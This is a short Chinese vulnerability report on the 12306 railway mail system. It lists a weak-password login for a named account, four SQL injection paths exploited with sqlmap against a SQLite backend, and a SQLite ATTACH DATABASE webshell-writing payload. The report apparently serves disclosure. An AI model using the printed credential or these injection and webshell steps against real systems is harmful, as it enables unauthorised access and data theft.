不要想着看标题能找到漏洞,别费劲了!
下载的tangscan的插件,好厉害!
下载的tangscan的插件检测到的
http://mail.12306.cn/app/mail/entry
邮箱弱口令:
zhangyong/123456
本想看看上传的地方有没有问题,结果只发现了SQL注入
http://mail.12306.cn post: /app/simple/mail/Folder/list/Sent/0/20* /app/simple/mail/Folder/list/Draft/0/20* /app/simple/mail/Folder/list/Spam/0/20* /app/simple/mail/Folder/list/Trash/0/20* 这4处应该都是SQL注入点
注入点空格需要替换成%20,不然就404
扔sqlmap,结果注入点类型是:SQLite,有点意思
5个表的结果如下:
mail: mtbno,mno,fno,new,size,time,dele,attach,mid,reply,mfrom,mto,subject,brief folder: fno,folder,sum,count,new,last searchmail: session,sno,mtbno,mno,fno,time sqlite_sequence: name,seq search: session,sno,time,count,name,value
SQLite出数据的方式不太一样,换个姿势--sql-shell
简单读几条数据证明危害
查了下,SQLite这玩意可以直接写shell,但是需要知道网站路径,不玩了
shell方式:
ATTACH DATABASE '$PATH\\shell.php' AS pwn; CREATE TABLE pwn.exp(dataz text); INSERT INTO pwn.exp(dataz)VALUES('');--
好不容易抢到回家的票!
俺是良民